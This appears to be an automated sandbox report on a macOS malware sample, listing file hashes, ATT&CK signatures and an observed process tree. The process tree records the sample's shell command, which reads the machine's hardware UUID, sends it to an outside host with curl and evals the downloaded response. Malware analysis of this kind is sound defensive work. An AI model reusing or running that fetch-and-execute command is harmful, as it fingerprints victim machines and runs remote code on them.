Analysis
-
max time kernel
93s -
max time network
167s -
platform
macos-10.15_amd64 -
resource
macos-20241106-en -
resource tags
-
submitted
17/02/2025, 18:06
General
-
Target
Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b
-
Size
48KB
-
MD5
c7049a42302fa05ac17127b788fe5da5
-
SHA1
61852110485fa2234e54ffae923e44c9722aeaaf
-
SHA256
0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b
-
SHA512
e12c5bd638f8116893a472513ba07bd8b01065622c8ecce8305b0044d2079a385a3a4a290ef360564b77e49a829f5aa4582486c4030ad874b2abde829ddbe513
-
SSDEEP
24:xKA/8C28ekM6S98SczqaycObLmJLyxjFqUDhMK3iWAbO7fec48u6f4xu6Dj6sR+r:xlOdTh3mtyx8UFM5HbO7z4x+H6Dj6s6
Malware Config
Signatures
-
Exfiltration Over Alternative Protocol 1 TTPs 2 IoCs
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
-
Queries the hardware information (I/O Kit registry). 1 TTPs 1 IoCs
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Processes
-
/bin/shsh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b\""1⤵
-
/bin/bashsh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b\""1⤵
-
/usr/bin/sudosudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b1⤵
-
/bin/zsh/bin/zsh -c /Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b2⤵
-
-
/Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b/Users/run/Macos-Malware-Samples-main/0ee6c8fd43c03e8dc7ea081dfa428f22209ed658f4ae358b867de02030cfc69b2⤵
-
-
/bin/shsh -c "MACHINEID=\"\$(ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.=\"IOPlatformUUID\"]/following-sibling::*[1]/text()' -)\";CONTENT=\$(curl --connect-timeout 900 -L \"https://api.macsnipper.com/v9/hbold?machine_id=\$MACHINEID&pr=macsnipper\");eval \"\$CONTENT\""1⤵
-
/bin/bashsh -c "MACHINEID=\"\$(ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.=\"IOPlatformUUID\"]/following-sibling::*[1]/text()' -)\";CONTENT=\$(curl --connect-timeout 900 -L \"https://api.macsnipper.com/v9/hbold?machine_id=\$MACHINEID&pr=macsnipper\");eval \"\$CONTENT\""1⤵
-
/usr/sbin/ioregioreg -ad2 -c IOPlatformExpertDevice1⤵
-
/usr/bin/xmllintxmllint --xpath "//key[.=\"IOPlatformUUID\"]/following-sibling::*[1]/text()" -1⤵
-
/usr/bin/curlcurl --connect-timeout 900 -L "https://api.macsnipper.com/v9/hbold?machine_id=79C87F0E-9227-5AAD-AA91-25F794E1F52E&pr=macsnipper"1⤵
-
/usr/libexec/xpcproxyxpcproxy com.apple.nsurlstoraged1⤵
-
/usr/libexec/nsurlstoraged/usr/libexec/nsurlstoraged --privileged1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD564f469698e53d0c828b7f90acd306082
SHA1bcc041b3849e1b0b4104ffeb46002207eeac54f3
SHA256d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd
SHA512a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f